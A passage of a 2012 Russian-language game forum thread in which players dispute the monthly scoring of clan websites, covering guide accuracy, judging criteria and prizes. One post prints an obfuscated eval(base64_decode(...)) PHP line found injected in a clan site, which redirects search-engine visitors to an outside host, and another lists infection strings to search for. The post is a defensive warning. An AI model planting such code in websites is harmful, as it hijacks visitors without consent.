»   Список форумов   »   Игровой форум   »   Порталы в Грани
 

Оценка Клановых Сайтов v.2 - Инициативная группа

Страницы: 1234567

KWiT_ - Пн 10 Сен, 2012 13:00
Hegel, Ты тоже не прав... Ваш ИП - да, самый большой...
Но увы, уже не лучший...

Chkalov - Пн 10 Сен, 2012 13:04
KWiT_,
Цитируя Канахамару:
2. Информационный портал
*информационная поддержка игроков и членов клана
Критерии:
- наличие гайдов и статей,
*наличие актуальных гайдов и статей, раскрывающих как можно больше необходимой информации для игроков.
- качество оформления гайдов и статей, их востребованность,
*гайды должны быть востребованы игрокам, написаны не для галочки и содержащие адекватную и корректную информацию, графическую информацию, не содержать грамматических ошибок, пустых ссылок.

первый пост этой темы

Hegel - Пн 10 Сен, 2012 13:20
KWiT_, Chkalov, я что то не вижу замечаний по гайдам.. судья их не читают? тогда нахрена окс =)

KWiT_ - Пн 10 Сен, 2012 13:21
Hegel, ну, я 2 месяца назад писал... пока 2 месяца не попадаю в ОКС... cool

Chkalov - Пн 10 Сен, 2012 13:34
Hegel,  например - глобальные события - просто документация. От форума отличаются только табличкой. Нет кузницы, нет инфы о прошедших событиях, о времени следующего. Считаете без этого гайд лучше или такой же информативный как наш? Я могу так половину гайдов перебрать. Нельзя собрать кольцо рандома, нет инфы о кольцах дп для всех уровней, нет обучалок или видео-уроков и тд. Требования к гайдам выросли - просто таблички теперь не достаточно, чтоб гайд был лучшим. Если я начну перечислять по каждому гайду - у меня на это уйдет уйма времени, да и я не Ваш соклан, чтоб этим заниматься. Судья оценить должен  и аргументировать, а не найти все ошибки.

Про ОДЛ мы вам писали 2 месяца назад - и никакой реакции на указанные ошибки. Зачем судье заморачиваться, если над сайтом не работают? Тут не "нахрена ОКС", а просто кто-то забил на свой сайт.

Hegel - Пн 10 Сен, 2012 16:52
Chkalov, просто кого то тошнит от граней.. а мои сокланы без меня стараются и работают

Chkalov - Пн 10 Сен, 2012 17:23
Hegel, не достаточно работают... не обновляют гайды вот и результат. И не надо все переводить на "авторитет БОД" - мы пишем по 10 гайдов в месяц, и не забываем обновлять старые.

Ирролан - Пн 10 Сен, 2012 18:17
Цитируя Chkalov:
Ирролан, а задавать вроде и нельзя если не ошибаюсь

Последний вопрос мне вчера Судья2 задал, где-то в 19.55, значит вы ошибаетесь
+ ещё фишка: результаты оценок видно стразу же после закрытия таблицы судьями, неважно когда они закрыли 1го числа или 6го. Получается, что  после того, как один из судьей завершил оценку - остальные могут посмотреть его баллы ещё до закрытия своих. Вроде по концепту ОКС таблицы должны быть доступны всем только 7го числа.

Бульвинкль - Пн 10 Сен, 2012 21:37
Цитируя Chkalov:
. У Вас куча устаревшей инфы на сайте, гайдами никто не занимается

при всём уважении к вам,не могли бы вы показать хоть один гайд с устаревшей инфой?...

Про ОДЛ писали во первых не два месяца назад а месяц, ну а во вторых то что вы нам написали  http://clip2net.com/s/2hSiH ... посмотрел наш гайд и http://forum.ereality.ru/topic23019/page1.html документацию. Всё совпадает.

Да,кстати,
Цитируя Chkalov:
Судья оценить должен  и аргументировать, а не найти все ошибки.


Цитируя Канахамару:
3. Судья обязан как можно более подробно и ясно описать, чего не хватает тому или иному клановому сайту для получения максимальной оценки в каждой категории.


А что в итоге? смотрим результаты за июнь "Diablo [16]  Очень удобное оформление информации, никакого хлама, все четко. Сервисов не так много как хотелось бы , но актуально оформлены. ДП онлайн от прошлой версии ДП. Отсутствие собственной переодевалки, обновленные гайды , гайды инстансов и т.д. заслуживают наивысшей оценки сайта по ИП."

Результаты за август "Судья4: Очень удобное оформление информации, никакого хлама, все четко. Сервисов не так много как хотелось бы , но актуально оформлены. ДП онлайн от прошлой версии ДП. Отсутствие собственной переодевалки, обновленные гайды , гайды инстансов и т.д. заслуживают наивысшей оценки сайта по ИП."

Дежавю? Хотя ДП онлайн убрали сразу....

Chkalov - Вт 11 Сен, 2012 1:06
Бульвинкль, у вас в гайде ОДЛ до сих пор "Случайным образом выбирается карта действий, или ОДЛ1, или ОДЛ2, ознакомиться с картами турнира можно нажав на название карты." - это первое, что бросается в глаза, даже не глядя в документацию. Островов 11 вообще-то.

Навыки  - последняя правка в апреле - 10. Знаток монстров. Действует теперь во всех видах боев.  У вас только в боях с ботом.

Мне лень смотреть дальше. Мы за это билеты дарим.

Hegel - Вт 11 Сен, 2012 7:04
Chkalov, если я тебе говорю что ты виновен, то я должен предъявить какие то доказательства, а не написать общую фразу - в гайдах ошибка.. За инфу спасибо поправим.

Hegel - Вт 11 Сен, 2012 7:17
Chkalov, основная задача окс не только раздать премии, но еще и развитие клан сайтов, если все будут гнаться только за деньгами то мы вернемся к той же ситуации что была года 2 назад, фридум бод и аа получали деньги а все остальные гуляли нахрен...

Я не вижу сейчас активности над кс сайтами которая была раньше. Думаю во многом виноваты люди стремящиеся переделать окс...

А если ты помнишь то как оценивали сайты кепыч, квит сейнт, я да и ты сам, то мы писали всегда нормальный развернутые коменты по сайтам претендующим на места ... указывали на ошибки давали рекомендации..

Почитай, или ты уже забыл что было всего лишь год назад?

Chkalov - Вт 11 Сен, 2012 9:56
Hegel, ну никогда никто не искал все ошибки, видели что гайды устарели и правки в них не внесли - снизили оценку, что увидели - написали. Не реально перелопатить все гайды и обновить их  кому-то. Если так смотреть - то надо премии комиссии раз в 10 больше делать... как минимум.

Ангел Ночи - Вт 11 Сен, 2012 14:13
Цитируя Ирролан:
Вроде по концепту ОКС таблицы должны быть доступны всем только 7го числа.
5

Ирролан - Вт 11 Сен, 2012 15:32
Ангел Ночи,
Цитируя SaintDragon:
~ 1 - 6 выставление оценок
~ 7 - 9 решение вопросов по спорным оценкам и утверждение оценок СП

Ангел Ночи - Вт 11 Сен, 2012 15:42
Ирролан, сорри

а у кого на сайте итог подведен по окс?

Kniginia - Вт 11 Сен, 2012 16:26
Ангел Ночи, у нас http://order.ereality.ru/news.php?readmore=3670, вчера несколько бурный день был и не успела сделать все. Сегодня только опубликовали.

Бульвинкль - Вт 11 Сен, 2012 22:02
Цитируя Chkalov:
Мне лень смотреть дальше
а больше ничего не смогли вы найти вот и лень смотреть дальше...

Chkalov - Ср 12 Сен, 2012 8:02
Бульвинкль, навскидку - не верное расписание элитки. Нет информации о проведении боев без участия противника. И не надо брать меня на понт, я найду Вам, когда будет комиссия работать, если Вам лень искать и обновлять самостоятельно. Как минимум пол года никто не толком не занимается обновлением гайдов - бери любую правку и смотри.

Бульвинкль - Ср 12 Сен, 2012 22:09
Цитируя Chkalov:
Бульвинкль, у вас в гайде ОДЛ до сих пор "Случайным образом выбирается карта действий, или ОДЛ1, или ОДЛ2, ознакомиться с картами турнира можно нажав на название карты." - это первое, что бросается в глаза, даже не глядя в документацию. Островов 11 вообще-то.
если у вас проблемы со зрением то сообщу вам что то что вы написал полнейшая чушь...заметьте никто ничего не правил...я специально посмотрел вчера то что написано в гайде и сравнил с вашей цитатой....facepalm нет слов....ваши посты не содержат достоверной информации вообще!...будете в комиссии-пожалуйста ищите...найдете будем рады....кстати, так для порядка, сообщу вам что все гайды обновлялись в течение последних трех месяцев...а вот у вас на сайте есть ссылочки нерабочие...так что мелких недоработок у всех хватает....

Chkalov - Чт 13 Сен, 2012 1:22
Бульвинкль, прошу меня простить - но Вы врете. Это цитата с Вашего сайта, и гайд был исправлен. Вы или не в курсе, кто и что делает на сайте, либо просто врете - мне не пришло в голову скрин делать, но теперь буду знать и в комиссии будем скринить.

Цитируя Бульвинкль:
а вот у вас на сайте есть ссылочки нерабочие...

еще раз - это не оценивается, читайте критерии.

Бульвинкль - Чт 13 Сен, 2012 22:23
Chkalov, как вам будет угодно...доказать не могу ни я,ни вы ничего...по вашему я вру? пожалуйста..с вами спорить что против ветра в туалет идти...а в комиссии будете еще раз повторю пожалуйста скриньте, предьявляйте а не пустозвоньте.... на сём считаю разговор с вами оконченым...

Chkalov - Пт 14 Сен, 2012 1:00
Hegel, прошу отписаться и честно сказать - менялся ли гайд ОДЛ. Вы, думаю, не станете обманывать.

Hegel - Пт 14 Сен, 2012 6:46
Chkalov, как я уже писал ранее, я не играл больше полу года.. поэтому увы ничего сказать не могу.. Да и в принцыпе не вижу катастрофы если такая ошибка была... развели тут споры.. булю я уже это высказал.

По идее ребята обновляют гайды когда видят какие то правки на онл или сайте сп.. иначе все гайды в том числе и эльфолес были бы с устаревшими данными... Может что то пропустили, может нет.. я проверок всех гайдов редко проводил, у меня столько времени никогда не было.. если я что то пропускал оценщики писали что и где уже потом исправлял...


как же блин спать хочется...

DAK_L7 - Пн 17 Сен, 2012 22:08
Где премия судьям?

Kniginia - Сб 22 Сен, 2012 12:35
Цитируя DAK_L7:
Где премия судьям?

Выдала.

Извините, за задержку.

DAK_L7 - Сб 22 Сен, 2012 20:40
Kniginia,  Благодарю.

DAK_L7 - Сб 22 Сен, 2012 21:45
Kniginia, нет премииblink   как было на счету ноль, так и осталось

Kniginia - Сб 22 Сен, 2012 22:39
DAK_L7, проверила, действительно так... blink  странно... Сейчас закончила переводы. В первый раз делаю...wub

DAK_L7 - Вс 23 Сен, 2012 21:03
Kniginia, Теперь есть)

KWiT_ - Вт 25 Сен, 2012 19:35
На нашем клан-сайте у некоторых выскакивало предупреждение от антивирусных программ.
После долгих поисков по текстам php-файлов нашел подобную строку:
Цитата:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyDQoNCigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHINCg0KKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgDQoNCm9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpe2hlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9iZXN0dHJ1LnFwb2UuY29tLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ=="));


Это и есть вредоносный код. Можно проверить его суть тут: http://base64.ru/
Если у кого-то встречаются подобные строки - прошу тоже проверить.

P.S. Спасибо всем, кто помог с обнаружением вируса
P.P.S. Будьте бдительны! cool

KWiT_ - Ср 26 Сен, 2012 23:04
Если у кого-то еще на наш клан-сайт ругается антивирус - просьба писать в ЛС - на каких страницах, какой антивирус и что именно пишется...
Кто поможет полностью избавиться - тому будет от меня благодарность cool

Снежная Королева - Чт 27 Сен, 2012 3:50
KWiT_, а не легче будет скачать полностью все файлы с сайта и через notepad++ сделать запрос в папке eval(base64 huh

KWiT_ - Чт 27 Сен, 2012 23:20
Снежная Королева, делал... не нашел...
а в создаваемых страницах опять появляется JS

Снежная Королева - Сб 29 Сен, 2012 15:04
KWiT_, если у вас стоит платный DLE, напишите в тех.поддержку думаю помогут решить проблему, если нет то может лучше сохранить базу и скрипты и сделать вайп? И все с 0 загрузить, тогда и будет видно в ходе дела откуда растут ноги, но я-бы разобрала модуль добавления статистических страниц если при создании страницы появляется данный вредоносный код.

ot_MOROZ_ok - Вс 30 Сен, 2012 18:51
Снежная Королева, У меня нет времени и недостаточно квалификации - самому разобрать этот модуль...
Хотя последние 2 недели только этим и занимаюсь...

Kniginia - Пн 01 Окт, 2012 13:24
ЛС судьям разосланы.

Ненаглядный - Пн 01 Окт, 2012 16:45
Цитируя KWiT_:
На нашем клан-сайте у некоторых выскакивало предупреждение от антивирусных программ.

практически у всех сайтов, на хостинге еркланс. еще поэтому мы сменили хостинг.
и, вероятно, у тебя опять появится этот код, даже когда вычистишь: мой опыт. ставь на все файлы режим чтения, без записи. перед правкой - возвращай норм.
можешь поискать еще по таким вхождениям:
somecrainsignvar=
ad.yandex-verification.net/verify
firefoxstabs.com

и еще много-много неожиданностей biggrin
уж не знаю, каким образом на линуксе ползает вирус по сайтам. и от какого юзера это все началось

Ангел Ночи - Пн 01 Окт, 2012 17:23
blink

Ирролан - Пн 01 Окт, 2012 23:54
Вроде бы клан Bregan D`art подавал заявку на оценку сайта, а в списке оцениваемых сайтов их нет. Не прошли дресс-код?

Бульвинкль - Вт 02 Окт, 2012 0:02
Ненаглядный, уж не знаю как у тебя а у меня кроме тамплиеров ни на один сайт с хоста еркланс вирус не ругался

Chkalov - Вт 02 Окт, 2012 0:20
Ирролан, может СП не увидели не подтвердили, пусть свяжутся включу

KWiT_ - Вт 02 Окт, 2012 15:07
Бульвинкль, В этот раз - да. А раньше такое бывало не только у нас.
Постараюсь сегодня перезалить движок и поменять права доступа к файлам

KWiT_ - Ср 03 Окт, 2012 0:32
Перезалил заново движок клан-сайта, оставил на файлы движка доступ только на чтение...
Если у кого-то еще возникает предупреждение о вирусе - прошу дать знать

Ангел Ночи - Ср 03 Окт, 2012 11:44
Прошу прощения, на этот месяц заявку вроде не подавал.
Только увидел, что в судьях, не смогу оценить в связи с днем рождения и запарай на работеsad

Hegel - Ср 03 Окт, 2012 12:32
Отдайте мне место ангела ночи =)) оценю быстро и качественно wub

Ангел Ночи - Ср 03 Окт, 2012 14:14
Цитируя Hegel:
Отдайте мне место ангела ночи =)) оценю быстро и качественно
согласен на 100% и даже был бы радwub

Hegel - Ср 03 Окт, 2012 19:41
Kniginia оО) кто то из моих в капустнике) поспрашиваю

Ирролан - Чт 04 Окт, 2012 23:34
Chkalov,
Цитируя Ирролан:
результаты оценок видно стразу же после закрытия таблицы судьями, неважно когда они закрыли 1го числа или 6го

Оценки судей теряют свою субъективность.

AcerKot - Пт 05 Окт, 2012 20:55


Удалено Пт 05 Окт, 2012 21:09 пользователем Kniginia

Evgeska - Пт 05 Окт, 2012 23:56
Судья4: К сожалению, детально прокомментировать все клан-сайты у меня не получится, по очень важным причинам. У всех нас бывают проблемы, прошу понять.

Любую оценку смогу обосновать в ЛС.


это не оценивание...нужно ликвидировать данного судью, так как это не комент к оценке (он не указывает ни ошибок, ни недочетов)

З.Ы. писать ЛС для Судья4 ???

Бульвинкль - Сб 06 Окт, 2012 0:35
Evgeska, точно бредblink

Chkalov - Сб 06 Окт, 2012 3:15
вопросы конечно можно задать в сервисе, но оценивание конечно не годится

Ангел Ночи - Сб 06 Окт, 2012 14:44
Как не странно, но пока что к судьям претензий нетуwub

Ирролан - Сб 06 Окт, 2012 15:02
Ангел Ночи, читай выше. А все вопросы в сервисе с завтрашнего дня .

AcerKot - Вс 07 Окт, 2012 0:42
Chkalov, Задал вопрос 2012-10-06 21:46:01
Точно все правильно?

Ваш клан - Отчет - Задать вопрос был активен

Великий Ужас - Пн 08 Окт, 2012 16:20
Evgeska, могу указать все недочеты и ошибки Вашего клан-сайта в ЛС, если хотите.

KWiT_ - Пн 08 Окт, 2012 17:39
Великий Ужас,  А мне тоже интересны недочеты его сайта. И не только его.
Мне тоже ЛС слать будете?

Kniginia - Пн 08 Окт, 2012 17:50
Великий Ужас, KWiT_, Evgeska, ЛС судьям разослала. Ждем ответы от судей в ветке вопросов... Понять можно все, но будем публично рассматривать оценки. Надеюсь до вечера 9 числа все решим мирно.

Evgeska - Пн 08 Окт, 2012 20:43
Цитируя Великий Ужас:
Evgeska, могу указать все недочеты и ошибки Вашего клан-сайта в ЛС, если хотите.


с удовольствием почитал бы...

З.Ы. меня более всего интересует недочеты и ошибки именно сервисного наполнения.

Ясли - Вт 09 Окт, 2012 19:30
Уважаемые сотрудники ОИ СП, прошу вас высказать свое мнение голосом по моим 2м оценкам.
Первая 9 баллов за ИП клана БоД, я критически не согласен с мнением судей. На сайте клана БоД, в открытом доступе(в 2 клика) есть гайды которые не только устарели, но и просто рассказывают о несуществующей информации. Более того, эта "фенечка" у них на сайте более 4 месяцев(когда я ее впервые заметил) и насколько я знаю уже указывалось им на это.
Если они до сих пор не убрали их значит намеренно держат в списке гайдов и вводят пользователей в заблуждение, следовательно они не могут претендовать на высшую оценку в категории ИП.
Так же я не согласен с голосованием по оценке 7 баллов у клан-сайта ТАМПЛИЕРЫ, вопросс задан по принципу - "А вот у других оценщиков сайт Б получил меньше чем сайт А".
Это не корректный вопрос, и сотрудник ОИ Княгиня уже высказалась с мнением что оценка справедлива.
Если же оценщики считают что оценка сайту Б была завышена они могли задать вопрос по сайту Б, а не по сайту А.

Chkalov - Вт 09 Окт, 2012 19:51
Ясли, даже если есть устаревший(е) гайды - исходя из вашей логики - отсутствие гайда лучше, чем наличие ссылки на устаревший и обновленный? Да, есть кое-какие проблемы с навигацией на сайте - мы занимаемся обновлением дизайна и исправим вместе с дизайном этот раздел, но в инфопортале не оцениваются сейчас устаревшие ссылки - оценивается та информация которая есть на сайте, и все обновленные гайды есть.

Kniginia - Вт 09 Окт, 2012 20:02
Цитируя Ясли:
Так же я не согласен с голосованием по оценке 7 баллов у клан-сайта ТАМПЛИЕРЫ, вопросс задан по принципу - "А вот у других оценщиков сайт Б получил меньше чем сайт А".
Это не корректный вопрос, и сотрудник ОИ Княгиня уже высказалась с мнением что оценка справедлива.
Если же оценщики считают что оценка сайту Б была завышена они могли задать вопрос по сайту Б, а не по сайту А.

Повторюсь
Если ИП не соответствует, то ему и занижать надо, указав в комментарии за что вы занижаете. С вами оспаривают ситуацию о сервисах, что в сервисах не так?
Цитируя Ясли:
Первая 9 баллов за ИП клана БоД, я критически не согласен с мнением судей. На сайте клана БоД, в открытом доступе(в 2 клика) есть гайды которые не только устарели, но и просто рассказывают о несуществующей информации. Более того, эта "фенечка" у них на сайте более 4 месяцев(когда я ее впервые заметил) и насколько я знаю уже указывалось им на это.
Если они до сих пор не убрали их значит намеренно держат в списке гайдов и вводят пользователей в заблуждение, следовательно они не могут претендовать на высшую оценку в категории ИП.

Чкалов раньше меня отписался и в целом он прав, касаемо КС БоД.


Хотя для меня остается загадкой, как так получается, что все выставили одинаковые оценки, но не согласны с точно такой же оценкой от одного из судей... (это по КС Тамплиеров)

Hegel - Вт 09 Окт, 2012 20:07
Chkalov, http://yo-bod.com/viewpage.php?page_id=87

Это не устаревший гайд, это гайд о несуществующим модуле. Вот я не зная этого зашел на сайт и прочитал. Где указано что инфа устарела?

Заменить 15 <a href=">Текст</a>
занимает не более 10минут


Вы можете честно ответить сколько месяцев устаревшая информация находится на том же месте?

KWiT_ - Вт 09 Окт, 2012 21:23
Цитируя Kniginia:
Хотя для меня остается загадкой, как так получается, что все выставили одинаковые оценки, но не согласны с точно такой же оценкой от одного из судей... (это по КС Тамплиеров)

Уже ответил в сервисе, повторюсь тут.
Я сайту Тамплиеров, как своему детищу поставил 7 баллов. Но лично я считаю, что мы заслуживаем большего - просто я более критичен к себе, чем к другим.
Поэтому я не согласился с теми судьями, кто поставил Тамплиерам 7, а другим сайтам, которые по моему мнению проигрывают сайту Тамплиеров по сервисам или ИП - поставили оценку больше.
К тем, кто поставил им оценку не выше - я претензий не имел...

А по поводу
Цитируя Ясли:
"А вот у других оценщиков сайт Б получил меньше чем сайт А"

почему не нравится принцип сравнения? Почему я должен занижать оценку другим, а не просить увеличить оценку себе?

Hegel - Вт 09 Окт, 2012 21:26
KWiT_, 2 набора разных сервисов сложно сравнивать. Если брать их в сухом остатке и считать по количеству то у них их больше и работают не хуже :) за 1 поиск кудесника вам оценку ставить не дело.

Kniginia - Вт 09 Окт, 2012 21:48
KWiT_, массовость меня огорчает. Все же разброс в оценках был бы более показателен, как личное мнение Судьи.
З.Ы. А еще, если бы все Судья голосовали по вопросам...

Бульвинкль - Вт 09 Окт, 2012 22:31
Цитируя Chkalov:
но в инфопортале не оцениваются сейчас устаревшие ссылки - оценивается та информация которая есть на сайте, и все обновленные гайды есть.

Михаил давайте не будем лукавить. Смотрим критерии оценок:

Информационный портал 0-10
*информационная поддержка игроков и членов клана
Критерии:
- наличие гайдов и статей,
*наличие актуальных гайдов и статей, раскрывающих как можно больше необходимой информации для игроков.
- качество оформления гайдов и статей, их востребованность,
*гайды должны быть востребованы игрокам, написаны не для галочки и содержащие адекватную и корректную информацию, графическую информацию, не содержать грамматических ошибок, пустых ссылок.

Так как же по вашему это соотносится с
Цитируя Chkalov:
но в инфопортале не оцениваются сейчас устаревшие ссылки  
?
Если есть гайд и он не актуален значит за его наличие нужно оценку занижать или я не прав? Ведь занижали же нашему сайту три месяца подряд оценку только за то что находили где-то( но не на сайте в библиотеке) устаревший ДП онлайн.

Kniginia - Ср 10 Окт, 2012 0:32
В общем таблицу закрываем завтра (10 числа тобишь).

К Судьям убедительная просьба голосовать за вопросы других (согласны вы или нет, не высказанное мнение больнее ударит по вам же). Спорные моменты старались решать сразу, но из-за проблем одного из Судей вышло неудачно.

Просьба ко всем желающим участвовать в ОКС:
Если у вас появляются обстоятельства, которые не дадут в полной мере работать с оценкой кланов, то сообщайте об этом вовремя (как это сделал АН в этом месяце). Давайте не будем усложнять жизнь себе и другим Судьям. В этом месяце было много событий, я понимаю всех, но и вы думайте о других.


Так же я бы хотела услышать Общественное мнение на тему - Хотели бы, чтобы Творческая ОКС вошла в состав?
Желательно с доводами "за" и "против", если есть свое мнение как это должно выглядеть, то пишите.

Hegel - Ср 10 Окт, 2012 7:14
Kniginia, достаточно сравнить качество и количество новостей которые выходили на КС год назад, все же были не только статьи о новостях админов или внутри-клановой жизни... Сейчас это никому нафиг не нужно. И смысл в том, что не нужно будет и дальше пока не будет прямой зависимости от конечного пользователя :)

KWiT_ - Ср 10 Окт, 2012 11:16
Hegel,  Я не говорю об оценке разных сервисов.
Но, согласись, сайт где есть уникальные сервисы, даже если количество сервисов в целом меньше, все-таки достоин большей оценки, где есть просто бОльшее количество - но стандартных сервисов. Причем их величина не намного больше, если посчитать.
Да ты и сам знаешь - реализация идеи уникальности - и даже просто удобного и максимально актуального калькулятора - занимает гораздо больше времени.
Не зря же ты был основным покупателем моих калькуляторов для своего КС cool

Цитируя Kniginia:
KWiT_, массовость меня огорчает. Все же разброс в оценках был бы более показателен, как личное мнение Судьи

5 челове в комиссии - это, увы, не массовость. Хотя те, кого отбирают сейчас в большинстве более авторитетны, чем в предыдущей версии комиссии.
Вот только я всегда буду протестовать против оценок "за компанию". Т.е. если я своему сайту поставлю, например 7 - как в этот раз и все судьи тоже просто  поставят такую же оценку ("а зачем больше, если сам автор ставит такую же?") - то я такие оценки буду оспаривать.
Тем более - я никогда не спорил просто так, а всегда привожу аргументы.... Чего, увы, не скажешь о некоторых судьях

Kniginia - Ср 10 Окт, 2012 13:51
Hegel, ну так сделаем так, чтобы была заинтересованность. Поэтому и узнаю мнение жаждущих о Творческой ОКС. Вдруг появится радуга и все захотят, в таком случае можно будет и на вышестоящее начальство давать, дабы получить добро на реализацию.

KWiT_, соглашусь, что в этом месяце были авторитетные судья, но в в плане реала начало месяца вышло не очень. У людей есть реал и он важнее, поэтому я не скажу что полностью довольна этим месяцем, и результатами работы. Есть идеи как улучшить, попробуем все сделать. А ваше мнение какое на счет Творческой ОКС?

KWiT_ - Ср 10 Окт, 2012 14:04
Kniginia,  Если говорить о творческой ОКС - то тут у меня одно мнение: нужно премировать не кланы, а непосредственных исполнителей. Иначе расстановка сил особо не изменится, а людям не из топ-кланов будет сложно пробиться в премируемые сайты.
В лучшем (или худшем?) случае эти люди просто перейдут в другие кланы, дабы получать эти плюшки через клан-казну

Kniginia - Ср 10 Окт, 2012 15:43
KWiT_, к сожалению премировать людей (журналистов) нельзя золотомsad  Вот тут и заключается основная проблема, что журналисты не смогут получать напрямую награду за работу.

KWiT_ - Ср 10 Окт, 2012 16:24
Kniginia,  А без премирования напрямую - пусть даже серебром, но по рыночному, а не официальному курсу - все творчество сведется к тому же что и было в предыдущей версии ОКС.
Хотя это лично мое мнение

Hegel - Ср 10 Окт, 2012 19:43
KWiT_, http://sp.erclans.ru/evgeska/map/map.php это не уникальный сервис?

Hegel - Ср 10 Окт, 2012 19:49
Цитируя KWiT_:
Не зря же ты был основным покупателем моих калькуляторов для своего КС

другие не продавали ;)

KWiT_ - Ср 10 Окт, 2012 20:00
Hegel,  А что в этой карте уникального? Как по мне - у ЗК гораздо уникальнее...
По моим калькам - неправда, продавали... Не я один был...
Хотя, если ты по этому критерию выбирал, а не по качеству функционала....

Hegel - Ср 10 Окт, 2012 22:33
KWiT_, карт шахт рабочих 2 или 3.. вполне уникальный сервис который котировался всегда на уровне с переодевалкой..

Я в принцыпе тебе показал что у них есть сервисы не хуже :) и оценщик имеет полное право по своим критериям дать разные оценки вашим порталам. Он счел их лучше... кто то другой вас лучше, в этом и есть работа системы. Мы не должны добиваться 100% идентичных оценок у всех оценщиков, у каждого должно быть свое мнение.

p.s этому бы поспособствовало увеличение количества баллов в 2 раза.. тогда разница в 2-3 балла была бы не существенна но при этом отображала позицию оценщика в целом..

KWiT_ - Ср 10 Окт, 2012 22:42
Hegel,  ок, проникся... Буду считать рабочей и уникальной. Хотя это и не снимает проблем с неправкой ошибок в их старых сервисах

Hegel - Чт 11 Окт, 2012 7:45
KWiT_, обычно когда такое пишут указывают на ошибки :) Иначе проверить нельзя

KWiT_ - Чт 11 Окт, 2012 9:41
Hegel, я как раз и писал об ошибках в кальках повара и плотника

Kniginia - Вс 14 Окт, 2012 16:13
Результаты на сайте СП вывешены.

Премия Судьям выдана.
Премия Кланам выдана.

liestade - Сб 03 Ноя, 2012 22:58
Хочу обратить внимание оценщиков на несколько вернувшийся к жизни наш сайт и изменения в материалах
http://forum.ereality.ru/topic93944/page15.html  и  http://forum.ereality.ru/topic93944/page16.html
smile

Invoker - Вт 06 Ноя, 2012 12:42
Интересно, каким должно быть кол-во сервисов на сайте чтобы гарантированно получать 7+ баллов при условии, что сервисы выполнены на высоком уровне информативности и дружественности интерфейса?

KWiT_ - Вт 06 Ноя, 2012 13:05
Invoker, Кроме информативности и дружественного интерфейса нужны актуальность и оригинальность. Т.е. только калькуляторами профессий, которые есть у всех - никого не удивишь

Chkalov - Вт 06 Ноя, 2012 13:16
Invoker, это зависит от конкурентов тоже, нельзя сказать - 10 сервисов и у вас + 7, потому что оценка выставляется не за количество - а в сравнении с остальными КС.
Как это еще иначе пояснить - если у Вас 100 сервисов, а у 7 конкурентов 150 - то возможно конкуренты распределят между собой первых 7 мест и Вы получите 3 балла. В то же время с тем же количеством сервисов но если у конкурентов по 20 - вы получите 10. Тут оценка не как в школе - "ответил - 5", тут конкурс - "чем лучше ответил - тем выше балл  у тебя и хуже у конкурентов".

GaDoFF - Вт 06 Ноя, 2012 13:27
Chkalov, но мнения судей все равно останутся субъективными )

Chkalov - Вт 06 Ноя, 2012 13:35
GaDoFF, безусловно, они всегда такими будут - не зависимо от способа оценки. Объективности оценке придает то, что судья не один, и каждое мнение должно потом подтверждаться. Имхо 15 судей, как было изначально, было результативнее.

Invoker - Вт 06 Ноя, 2012 13:48
Chkalov, я это понимаю. Естественно с одним даже супер-пуперским сервисом невозможно получить высокую оценку в категории Сервисное наполнение,  поэтому и интересуюсь у нынешних и бывших судей, какое кол-во сервисов на сегодняшний день считается достаточным, в сравнении с остальными участниками конкурса, чтобы критерий численности отошёл на второй план и оценка производилась по критерию качества.

Кепыч - Вт 06 Ноя, 2012 15:54
Invoker, Все профы, плюс карты (ну кроме подземки - там логика сложная). Это минимум. Наличие оригинальных фишек в каждом кальке наверняка поднимет оценку КС. Ну а дальше идут ДП,КТ, и другие оригинальные сервисы.

Invoker - Вт 06 Ноя, 2012 17:20
Кепыч, спасибо добрый человек!

KWiT_ - Ср 07 Ноя, 2012 9:21
Уважаемые судьи! ну вы как-то смотрите.... а то 10 баллов за сервис Ширам наравне с ЗК и ОХЭ, а БоДам - 9 - это перебор по-моему....  blink

Hegel - Ср 07 Ноя, 2012 9:37
KWiT_, вай.. чем вам ширы нагадили что вы каждую окс в них каку кидаете?

KWiT_ - Ср 07 Ноя, 2012 9:49
Hegel, не нагадили... но считаю, что их сервисы пора обновить и сделать актуальными. И 10 они точно не заслуживают.
А сравниваю с ними, потому что им ставят за прошлые заслуги, что по мне неправильно...
Хоть и отношусь с почтением к их прогеру

Hegel - Ср 07 Ноя, 2012 9:51
Как то грустно с распределением в ОКС я туда 3 месяца попасть пытаюсь.. а тот же сейнт через раз ходит :(

KWiT_, не спорю :) 10 перебор. Просто я не очень хорошо отношусь к чистому сравнению... нужно оценивать каждый КС по отдельности, но не забывать об общих рамках и тенденциях.. Но оценивание сравниванием не дает грамотного результата

KWiT_ - Ср 07 Ноя, 2012 10:01
